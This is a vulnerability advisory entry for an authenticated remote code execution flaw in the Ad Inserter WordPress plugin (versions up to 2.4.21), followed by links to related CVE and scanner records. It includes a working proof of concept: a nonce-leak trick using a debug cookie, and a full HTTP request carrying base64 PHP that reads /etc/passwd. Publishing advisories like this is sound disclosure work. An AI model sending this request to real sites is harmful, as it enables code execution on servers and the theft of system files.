Lucene search
Ryan DewhurstWPEX-ID:FBFA36DC-7028-4A31-8A68-4B02DA80290CHistoryJul 15, 2019 - 12:00 a.m.
Ad Inserter <= 2.4.21 - Authenticated Remote Code Execution
2019-07-1500:00:00
Ryan Dewhurst
12
EPSS
0.008
Percentile
81.5%
The Ad Inserter – Ad Manager & AdSense Ads WordPress plugin was affected by an Authenticated Remote Code Execution security vulnerability.
The nonce (ai_check in the final request) can be obtained by querying the homepage with the AI_WP_DEBUGGING cookie set to 2.
Then, use an account with a role as low as subscriber to perform the request (payload below in the code parameter is base64 encoded for <?php echo file_get_contents('/etc/passwd'); ?>:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/wp-admin/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 130
Origin: http://127.0.0.1
Connection: close
Cookie: [SNIPPED]
Upgrade-Insecure-Requests: 1
action=ai_ajax_backend&preview=1&ai_check=[SNIPPED]&code=PD9waHAgZWNobyBmaWxlX2dldF9jb250ZW50cygnL2V0Yy9wYXNzd2QnKTsgPz4%3D&php=1Related
cvelist
cvelist
CVE-2019-15324
2019-08-22 13:37:47
openvas
openvas
WordPress Ad Inserter Plugin < 2.4.22 RCE Vulnerability
2019-07-16 00:00:00
WordPress Ad Inserter Plugin < 2.4.22 RCE Vulnerability
2019-09-16 00:00:00
wpvulndb
wpvulndb
Ad Inserter <= 2.4.21 - Authenticated Remote Code Execution
2019-07-15 00:00:00
prion
prion
Remote code execution
2019-08-22 14:15:00
nvd
nvd
CVE-2019-15324
2019-08-22 14:15:13
cve
cve
CVE-2019-15324
2019-08-22 14:15:13